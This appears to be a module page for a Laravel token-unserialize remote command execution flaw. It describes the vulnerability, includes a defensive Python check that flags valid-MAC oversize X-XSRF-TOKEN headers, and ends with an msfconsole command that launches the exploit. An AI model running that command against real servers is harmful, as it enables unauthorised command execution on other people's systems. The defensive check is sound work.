PHP Laravel



PHP Laravel Framework token Unserialize Remote Command Execution (2018-08-07)

This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29.
Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to
an insecure unserialize call in the decrypt method in Illuminate/Encryption/Encrypter.php.
Authentication is not required; however, exploitation requires knowledge of the Laravel APP_KEY.
Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix.
In some cases the APP_KEY is leaked, which allows for discovery and exploitation.
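
A defender-side check for the X-XSRF-TOKEN header described above, added here as an example and not taken from this page, Laravel or Metasploit: it verifies the MAC on the token envelope with the site's own APP_KEY and flags tokens that carry a valid MAC but are larger than anything the application issues. The envelope layout (base64 JSON with `iv`, `value`, `mac`), the 64-byte expected ciphertext size and all function names are assumptions of this example; the key and sample envelopes are constructed.

```python
import base64, hashlib, hmac, json

# Assumption: a genuine token is serialize() of a 40-character string,
# 48 bytes of plaintext, which AES-CBC pads to 64 bytes of ciphertext.
EXPECTED_CT_LEN = 64

def load_key(app_key):
    """Decode APP_KEY as written in .env ('base64:<key>' or bare base64)."""
    return base64.b64decode(app_key.split("base64:", 1)[-1])

def envelope_mac(key, iv_b64, value_b64):
    """HMAC-SHA256 over the base64 iv and value strings, hex encoded."""
    return hmac.new(key, (iv_b64 + value_b64).encode(), hashlib.sha256).hexdigest()

def classify_token(header_value, key):
    """Return 'malformed', 'bad_mac', 'normal' or 'oversize_valid_mac'."""
    try:
        env = json.loads(base64.b64decode(header_value, validate=True))
        iv, value, mac = env["iv"], env["value"], env["mac"]
        ct_len = len(base64.b64decode(value, validate=True))
        mac_ok = hmac.compare_digest(
            envelope_mac(key, iv, value).encode(), mac.encode())
    except (ValueError, KeyError, TypeError, AttributeError):
        return "malformed"
    if not mac_ok:
        return "bad_mac"  # sender does not hold APP_KEY: noise or probing
    # A valid MAC on a payload larger than any token the application issues
    # means the sender holds APP_KEY: treat the key as leaked and rotate it.
    return "normal" if ct_len <= EXPECTED_CT_LEN else "oversize_valid_mac"

def constructed_envelope(key, ct_len, valid_mac=True):
    """Constructed sample: zero bytes stand in for ciphertext (never decrypted)."""
    iv = base64.b64encode(bytes(16)).decode()
    value = base64.b64encode(bytes(ct_len)).decode()
    mac = envelope_mac(key, iv, value) if valid_mac else "0" * 64
    blob = json.dumps({"iv": iv, "value": value, "mac": mac})
    return base64.b64encode(blob.encode()).decode()

# Constructed key for the demo only; not a real APP_KEY.
DEMO_KEY = load_key("base64:" + base64.b64encode(bytes(range(32))).decode())

if __name__ == "__main__":
    for label, tok in [("issued-size", constructed_envelope(DEMO_KEY, 64)),
                       ("oversize", constructed_envelope(DEMO_KEY, 512)),
                       ("wrong mac", constructed_envelope(DEMO_KEY, 512, False)),
                       ("garbage", "not-base64!")]:
        print(label, "->", classify_token(tok, DEMO_KEY))
```

Run it over header values taken from web server or WAF logs; the check never decrypts or unserializes the payload, so it is safe to apply to untrusted input.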



msfconsole -x '
use exploit/unix/http/laravel_token_unserialize_exec ;
set APP_KEY dBLU...Fj0= ;
set VHOST ;
set RHOSTS ;
set LHOST ;
run ;'